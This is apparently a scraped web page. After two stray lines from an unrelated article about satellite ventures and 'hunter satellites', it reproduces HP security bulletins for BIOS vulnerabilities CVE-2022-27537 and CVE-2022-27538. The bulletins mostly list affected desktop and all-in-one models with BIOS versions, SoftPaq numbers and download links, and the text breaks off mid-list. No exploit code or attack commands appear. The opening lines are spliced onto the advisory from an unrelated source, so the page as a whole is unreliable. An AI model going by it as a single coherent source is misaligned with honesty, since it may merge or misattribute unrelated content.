Whether Rogers’ pursuit of a satellite venture is more likely to succeed, or just another piece of gung-ho science fiction, should be a lot clearer after SpaceX’s rocket launches in October.

Enter the Hunter Satellites Preparing for Space War

Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate these potential vulnerabilities.

CVE-2022-27537: HP PC BIOS August 2022 Additional Updates for Potential SMM and TOCTOU Vulnerabilities

A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in the BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate the potential vulnerability.

HP Elite Mini 600 G9 Desktop PC

BIOS

02.06.00

Rev 1

SP143258

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143258.exe

HP Elite Mini 800 G9 Desktop PC

BIOS

02.06.00

Rev 1

SP143258

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143258.exe

HP Elite SFF 600 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP Elite SFF 800 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP Elite Slice

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice for Meeting Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice G2 - Audio Ready with Zoom Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice G2 - Partner Ready with Microsoft Teams Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice G2 with Microsoft Teams Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice G2 with Intel Unite

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Slice G2 with Zoom Rooms

BIOS

02.59

Rev 1

SP143216

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143216.exe

HP Elite Tower 600 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP Elite Tower 680 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP Elite Tower 800 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP Elite Tower 880 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143123

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143123.exe

HP EliteDesk 705 G4 Desktop Mini PC

BIOS

02.20.00

Rev 1

SP143221

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143221.exe

HP EliteDesk 705 G4 Microtower PC

BIOS

02.20.00

Rev 1

SP143360

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143360.exe

HP EliteDesk 705 G4 Small Form Factor PC

BIOS

02.20.00

Rev 1

SP143193

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143193.exe

HP EliteDesk 705 G5 Desktop Mini PC

BIOS

02.15.00

Rev 1

SP143211

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143211.exe

HP EliteDesk 705 G5 Small Form Factor PC

BIOS

02.15.00

Rev 1

SP142686

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142686.exe

HP EliteDesk 800 35W G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142728

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142728.exe

HP EliteDesk 800 35W G4 Desktop Mini PC

BIOS

02.21.00

Rev 1

SP143306

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143306.exe

HP EliteDesk 800 65W G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142728

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142728.exe

HP EliteDesk 800 65W G4 Desktop Mini PC

BIOS

02.21.00

Rev 1

SP143306

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143306.exe

HP EliteDesk 800 95W G4 Desktop Mini PC

BIOS

02.21.00

Rev 1

SP143306

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143306.exe

HP EliteDesk 800 G3 Small Form Factor PC

BIOS

02.44

Rev 1

SP143373

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143373.exe

HP EliteDesk 800 G3 Tower PC

BIOS

02.44

Rev 1

SP143373

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143373.exe

HP EliteDesk 800 G4 Small Form Factor PC

BIOS

02.21.00

Rev 1

SP143335

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143335.exe

HP EliteDesk 800 G4 Tower PC

BIOS

02.21.00

Rev 1

SP143335

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143335.exe

HP EliteDesk 800 G5 Desktop Mini PC

BIOS

02.15.00

Rev 1

SP142789

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142789.exe

HP EliteDesk 800 G5 Small Form Factor PC

BIOS

02.15.00

Rev 1

SP143308

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143308.exe

HP EliteDesk 800 G5 Tower PC

BIOS

02.15.00

Rev 1

SP143308

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143308.exe

HP EliteDesk 800 G6 Desktop Mini PC

BIOS

02.13.00

Rev 1

SP143177

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143177.exe

HP EliteDesk 800 G6 Small Form Factor PC

BIOS

02.13.00

Rev 1

Sp143278

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143278.exe

HP EliteDesk 800 G6 Tower PC

BIOS

02.13.00

Rev 1

Sp143278

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143278.exe

HP EliteDesk 800 G8 Desktop Mini PC

BIOS

02.10.00

Rev 1

SP143361

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143361.exe

HP EliteDesk 800 G8 Small Form Factor PC

BIOS

02.10.00

Rev 1

SP143417

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143417.exe

HP EliteDesk 800 G8 Tower PC

BIOS

02.10.00

Rev 1

SP143417

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143417.exe

HP EliteDesk 805 G6 Desktop Mini PC

BIOS

02.10.00

Rev 1

SP143181

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143181.exe

HP EliteDesk 805 G6 Small Form Factor PC

BIOS

02.10.00

Rev 1

SP143179

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143179.exe

HP EliteDesk 805 G8 Desktop Mini PC

BIOS

02.06.00

Rev 1

SP143183

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143183.exe

HP EliteDesk 805 G8 Small Form Factor PC

BIOS

02.06.00

Rev 1

SP143312

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143312.exe

HP EliteDesk 880 G3 Tower PC

BIOS

02.44

Rev 1

SP143373

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143373.exe

HP EliteDesk 880 G4 Tower PC

BIOS

02.21.00

Rev 1

SP143335

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143335.exe

HP EliteDesk 880 G5 Tower PC

BIOS

02.15.00

Rev 1

SP143308

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143308.exe

HP EliteDesk 880 G6 Tower PC

BIOS

02.13.00

Rev 1

Sp143278

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143278.exe

HP EliteDesk 880 G8 Tower PC

BIOS

02.10.00

Rev 1

SP143417

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143417.exe

HP EliteOne 1000 G1 23.8-in All-in-One Business PC

BIOS

02.44

Rev 1

SP142689

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142689.exe

HP EliteOne 1000 G1 23.8-in Touch All-in-One Business PC

BIOS

02.44

Rev 1

SP142689

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142689.exe

HP EliteOne 1000 G1 27-in 4K UHD All-in-One Business PC

BIOS

02.44

Rev 1

SP142689

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142689.exe

HP EliteOne 1000 G1 34-in Curved All-in-One Business PC

BIOS

02.44

Rev 1

SP142689

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142689.exe

HP EliteOne 1000 G2 23.8-in All-in-One Business PC

BIOS

02.21.00

Rev 1

SP143212

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143212.exe

HP EliteOne 1000 G2 23.8-in Touch All-in-One Business PC

BIOS

02.21.00

Rev 1

SP143212

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143212.exe

HP EliteOne 1000 G2 27-in 4K UHD All-in-One Business PC

BIOS

02.21.00

Rev 1

SP143212

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143212.exe

HP EliteOne 1000 G2 34-in Curved All-in-One Business PC

BIOS

02.21.00

Rev 1

SP143212

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143212.exe

HP EliteOne 800 G3 23.8 Non-Touch Healthcare Edition All-in-One Business PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Non-Touch GPU All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Touch All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G3 23.8-inch Touch GPU All-in-One PC

BIOS

02.44

Rev 1

SP142724

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142724.exe

HP EliteOne 800 G4 23.8-in Healthcare Edition All-in-One Business PC

BIOS

02.21.00

Rev 1

SP143222

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143222.exe

HP EliteOne 800 G4 23.8-inch Non-Touch All-in-One PC

BIOS

02.21.00

Rev 1

SP143222

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143222.exe

HP EliteOne 800 G4 23.8-inch Non-Touch GPU All-in-One PC

BIOS

02.21.00

Rev 1

SP143222

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143222.exe

HP EliteOne 800 G4 23.8-inch Touch All-in-One PC

BIOS

02.21.00

Rev 1

SP143222

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143222.exe

HP EliteOne 800 G4 23.8-inch Touch GPU All-in-One PC

BIOS

02.21.00

Rev 1

SP143222

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143222.exe

HP EliteOne 800 G5 23.8-in Healthcare Edition All-in-One

BIOS

02.15.00

Rev 1

SP143218

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143218.exe

HP EliteOne 800 G5 23.8-inch All-in-One

BIOS

02.15.00

Rev 1

SP143218

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143218.exe

HP EliteOne 800 G6 24 All-in-One PC

BIOS

02.13.00

Rev 1

SP143213

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143213.exe

HP EliteOne 800 G6 27 All-in-One PC

BIOS

02.13.00

Rev 1

SP143213

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143213.exe

HP EliteOne 800 G8 24 All-in-One PC

BIOS

02.10.00

Rev 1

SP143346

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143346.exe

HP EliteOne 800 G8 27 All-in-One PC

BIOS

02.10.00

Rev 1

SP143346

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143346.exe

HP EliteOne 840 23.8 inch G9 All-in-One Desktop PC

BIOS

02.06.00

Rev 1

SP143270

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143270.exe

HP EliteOne 870 27 inch G9 All-in-One Desktop PC

BIOS

02.06.00

Rev 1

SP143270

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143270.exe

HP Pro Mini 400 G9 Desktop PC

BIOS

02.06.00

Rev 1

SP143259

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143259.exe

HP Pro SFF 400 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143124

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143124.exe

HP Pro Tower 400 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143124

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143124.exe

HP Pro Tower 480 G9 Desktop PC

BIOS

02.06.00

Rev 1

sp143124

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143124.exe

HP ProDesk 400 G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142730

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142730.exe

HP ProDesk 400 G4 Desktop Mini PC

BIOS

02.21.00

Rev 1

SP143318

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143318.exe

HP ProDesk 400 G4 Small Form Factor PC

BIOS

02.44

Rev 1

SP142713

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142713.exe

HP ProDesk 400 G5 Desktop Mini PC

BIOS

02.15.00

Rev 1

SP142788

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142788.exe

HP ProDesk 400 G5 Microtower PC

BIOS

02.21.00

Rev 1

SP143354

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143354.exe

HP ProDesk 400 G5 Small Form Factor PC

BIOS

02.21.00

Rev 1

SP142731

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142731.exe

HP ProDesk 400 G6 Desktop Mini PC

BIOS

02.13.00

Rev 1

SP143232

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143232.exe

HP ProDesk 400 G6 Microtower PC

BIOS

02.15.00

Rev 1

SP143328

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143328.exe

HP ProDesk 400 G6 Small Form Factor PC

BIOS

02.15.00

Rev 1

SP143347

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143347.exe

HP ProDesk 400 G7 Microtower PC

BIOS

02.13.00

Rev 1

SP143290

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143290.exe

HP ProDesk 400 G7 Small Form Factor PC

BIOS

02.13.00

Rev 1

SP143344

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143344.exe

HP ProDesk 405 G4 Desktop Mini PC

BIOS

02.20.00

Rev 1

SP143220

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143220.exe

HP ProDesk 405 G6 Desktop Mini PC

BIOS

02.10.00

Rev 1

SP143182

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143182.exe

HP ProDesk 405 G6 Small Form Factor PC

BIOS

02.10.00

Rev 1

SP143189

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143189.exe

HP ProDesk 405 G8 Desktop Mini PC

BIOS

02.06.00

Rev 1

SP143184

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143184.exe

HP ProDesk 405 G8 Small Form Factor PC

BIOS

02.06.00

Rev 1

SP143307

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143307.exe

HP ProDesk 480 G4 Microtower PC

BIOS

02.44

Rev 1

SP143381

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143381.exe

HP ProDesk 480 G5 Microtower PC

BIOS

02.21.00

Rev 1

SP143354

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143354.exe

HP ProDesk 480 G6 Microtower PC

BIOS

02.15.00

Rev 1

SP143328

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143328.exe

HP ProDesk 480 G7 PCI Microtower PC

BIOS

02.13.00

Rev 1

SP143290

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143290.exe

HP ProDesk 600 G3 Desktop Mini PC

BIOS

02.44

Rev 1

sp142729

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142729.exe

HP ProDesk 600 G3 Microtower PC

BIOS

02.44

Rev 1

SP143379

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143379.exe

HP ProDesk 600 G3 Small Form Factor PC

BIOS

02.44

Rev 1

SP142708

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142708.exe

HP ProDesk 600 G4 Desktop Mini PC

BIOS

02.21.00

Rev 1

SP143315

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143315.exe

HP ProDesk 600 G4 Microtower PC

BIOS

02.21.00

Rev 1

SP143339

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143339.exe

HP ProDesk 600 G4 Small Form Factor PC

BIOS

02.21.00

Rev 1

SP142727

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142727.exe

HP ProDesk 600 G5 Desktop Mini PC

BIOS

02.15.00

Rev 1

SP142790

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142790.exe

HP ProDesk 600 G5 Microtower PC

BIOS

02.15.00

Rev 1

SP143326

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143326.exe

HP ProDesk 600 G5 Microtower PC (with PCI slot)

BIOS

02.15.00

Rev 1

SP143326

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143326.exe

HP ProDesk 600 G5 Small Form Factor PC

BIOS

02.15.00

Rev 1

SP143345

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143345.exe

HP ProDesk 600 G6 Desktop Mini PC

BIOS

02.13.00

Rev 1

SP143227

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143227.exe

HP ProDesk 600 G6 Microtower PC

BIOS

02.13.00

Rev 1

SP143288

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143288.exe

HP ProDesk 600 G6 PCI Microtower PC

BIOS

02.13.00

Rev 1

SP143288

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143288.exe

HP ProDesk 600 G6 Small Form Factor PC

BIOS

02.13.00

Rev 1

SP143337

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143337.exe

HP ProDesk 680 G3 Microtower PC

BIOS

02.44

Rev 1

SP143379

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143379.exe

HP ProDesk 680 G4 Microtower PC (With PCI slot)

BIOS

02.21.00

Rev 1

SP143329

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143329.exe

HP ProDesk 680 G6 PCI Microtower PC

BIOS

02.13.00

Rev 1

SP143288

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143288.exe

HP ProOne 400 G3 20-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 400 G3 20-inch Touch All-in-One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 400 G4 20-inch Non-Touch All-in-One Business PC

BIOS

02.21.00

Rev 1

sp143176

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143176.exe

HP ProOne 400 G4 23.8-inch Non-Touch All-in-One Business PC

BIOS

02.21.00

Rev 1

sp143176

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143176.exe

HP ProOne 400 G5 20-inch All-in-One Business PC

BIOS

02.15.00

Rev 1

sp143178

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143178.exe

HP ProOne 400 G5 23.8-inch All-in-One Business PC

BIOS

02.15.00

Rev 1

sp143178

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143178.exe

HP ProOne 400 G6 20 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP ProOne 400 G6 24 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP ProOne 440 23.8 inch G9 All-in-One Desktop PC

BIOS

02.06.02

Rev 1

SP143679

https://ftp.hp.com/pub/softpaq/sp143501-144000/sp143679.exe

HP ProOne 440 G4 23.8-inch Non-Touch All-in-One Business PC

BIOS

02.21.00

Rev 1

sp143176

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143176.exe

HP ProOne 440 G5 23.8-in All-in-One Business PC

BIOS

02.15.00

Rev 1

sp143178

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143178.exe

HP ProOne 440 G6 24 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP ProOne 480 G3 20-inch Non-Touch All-in One PC

BIOS

02.44

Rev 1

SP142699

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142699.exe

HP ProOne 600 G3 21.5-inch Non-Touch All-in-One PC

BIOS

02.44

Rev 1

SP142696

https://ftp.hp.com/pub/softpaq/sp142501-143000/sp142696.exe

HP ProOne 600 G4 21.5-inch Touch All-in-One Business PC

BIOS

02.21.00

Rev 1

sp143176

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143176.exe

HP ProOne 600 G5 21.5-in All-in-One Business PC

BIOS

02.15.00

Rev 1

sp143178

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143178.exe

HP ProOne 600 G6 22 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP Z1 G8 Tower Desktop PC

BIOS

02.10.00

Rev 1

SP143417

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143417.exe

HP ZHAN 66 Pro G3 22 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP ZHAN 66 Pro G3 24 All-in-One PC

BIOS

02.13.00

Rev 1

SP143224

https://ftp.hp.com/pub/softpaq/sp143001-143500/sp143224.exe

HP ZHAN 99 Pro 23.8 inch G9 All-in-One Desktop PC

BIOS

02.06.02

Rev 1

SP143679

https://ftp.hp.com/pub/softpaq/sp143501-144000/sp143679.exe

CVE-2022-27538: HP PC BIOS December 2022 Security Update (TOCTOU)

Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities.

HP Elite Slice for Meeting Rooms

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP Elite Slice G2 - Audio Ready with Zoom Rooms

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP Elite Slice G2 - Partner Ready with Microsoft Teams Rooms

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP Elite Slice G2 with Microsoft Teams Rooms

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP Elite Slice G2 with Intel Unite

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP Elite Slice G2 with Zoom Rooms

BIOS

2.55

Rev 1

SP136953

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136953.exe

HP EliteDesk 705 G3 Desktop Mini PC

BIOS

02.38

Rev 1

SP139824

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139824.exe

HP EliteDesk 705 G3 Microtower PC

BIOS

02.38

Rev 1

SP139855

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139855.exe

HP EliteDesk 705 G3 Small Form Factor PC

BIOS

02.38

Rev 1

SP139855

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139855.exe

HP EliteDesk 705 G4 Desktop Mini PC

BIOS

02.17.00

Rev 1

SP136818

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136818.exe

HP EliteDesk 705 G4 Microtower PC

BIOS

02.17.00

Rev 1

SP137054

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137054.exe

HP EliteDesk 705 G4 Small Form Factor PC

BIOS

02.12.00

Rev 1

SP137069

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137069.exe

HP EliteDesk 705 G4 Workstation Edition

BIOS

02.17.00

Rev 1

SP137054

https://ftp.hp.com/pub/softpaq/sp137001-137500/sp137054.exe

HP EliteDesk 705 G5 Desktop Mini PC

BIOS

02.11.00

Rev 1

SP136520

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136520.exe

HP EliteDesk 705 G5 Small Form Factor PC

BIOS

02.11.00

Rev 1

SP136508

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136508.exe

HP EliteDesk 800 35W G3 Desktop Mini PC

BIOS

02.40

Rev 3

SP139781

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139781.exe

HP EliteDesk 800 35W G4 Desktop Mini PC

BIOS

02.18.00

Rev 1

SP136969

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136969.exe

HP EliteDesk 800 65W G3 Desktop Mini PC

BIOS

02.40

Rev 3

SP139781

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139781.exe

HP EliteDesk 800 65W G4 Desktop Mini PC

BIOS

02.18.00

Rev 1

SP136969

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136969.exe

HP EliteDesk 800 95W G4 Desktop Mini PC

BIOS

02.18.00

Rev 1

SP136969

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136969.exe

HP EliteDesk 800 G3 Small Form Factor PC

BIOS

02.40

Rev 1

SP139852

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139852.exe

HP EliteDesk 800 G3 Tower PC

BIOS

02.40

Rev 1

SP139852

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139852.exe

HP EliteDesk 800 G4 Small Form Factor PC

BIOS

02.17.00

Rev 1

SP136495

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136495.exe

HP EliteDesk 800 G4 Tower PC

BIOS

02.17.00

Rev 1

SP136495

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136495.exe

HP EliteDesk 800 G4 Workstation Edition

BIOS

02.17.00

Rev 1

SP136495

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136495.exe

HP EliteDesk 800 G5 Desktop Mini PC

BIOS

02.11.00

Rev 1

SP136572

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136572.exe

HP EliteDesk 800 G5 Small Form Factor PC

BIOS

02.11.00

Rev 1

SP136499

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136499.exe

HP EliteDesk 800 G5 Tower PC

BIOS

02.11.00

Rev 1

SP136499

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136499.exe

HP EliteDesk 880 G3 Tower PC

BIOS

02.40

Rev 1

SP139852

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139852.exe

HP EliteDesk 880 G4 Tower PC

BIOS

02.17.00

Rev 1

SP136495

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136495.exe

HP EliteDesk 880 G5 Tower PC

BIOS

02.11.00

Rev 1

SP136499

https://ftp.hp.com/pub/softpaq/sp136001-136500/sp136499.exe

HP EliteOne 1000 G1 23.8-in All-in-One Business PC

BIOS

02.40

Rev 1

SP139698

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139698.exe

HP EliteOne 1000 G1 23.8-in Touch All-in-One Business PC

BIOS

02.40

Rev 1

SP139698

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139698.exe

HP EliteOne 1000 G1 27-in 4K UHD All-in-One Business PC

BIOS

02.40

Rev 1

SP139698

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139698.exe

HP EliteOne 1000 G1 34-in Curved All-in-One Business PC

BIOS

02.40

Rev 1

SP139698

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139698.exe

HP EliteOne 1000 G2 23.8-in All-in-One Business PC

BIOS

02.18.00

Rev 1

SP136988

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136988.exe

HP EliteOne 1000 G2 23.8-in Touch All-in-One Business PC

BIOS

02.18.00

Rev 1

SP136988

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136988.exe

HP EliteOne 1000 G2 27-in 4K UHD All-in-One Business PC

BIOS

02.18.00

Rev 1

SP136988

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136988.exe

HP EliteOne 1000 G2 34-in Curved All-in-One Business PC

BIOS

02.18.00

Rev 1

SP136988

https://ftp.hp.com/pub/softpaq/sp136501-137000/sp136988.exe

HP EliteOne 800 G3 23.8 Non-Touch Healthcare Edition All-in-One Business PC

BIOS

02.40

Rev 1

SP139797

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139797.exe

HP EliteOne 800 G3 23.8-inch Non-Touch All-in-One PC

BIOS

02.40

Rev 1

SP139797

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139797.exe

HP EliteOne 800 G3 23.8-inch Non-Touch GPU All-in-One PC

BIOS

02.40

Rev 1

SP139797

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139797.exe

HP EliteOne 800 G3 23.8-inch Touch All-in-One PC

BIOS

02.40

Rev 1

SP139797

https://ftp.hp.com/pub/softpaq/sp139501-140000/sp139797.exe

HP EliteOne 800 G3 23.8-inch Touch GPU All-in-One PC

BIOS

02.40

Rev 1

SP139797
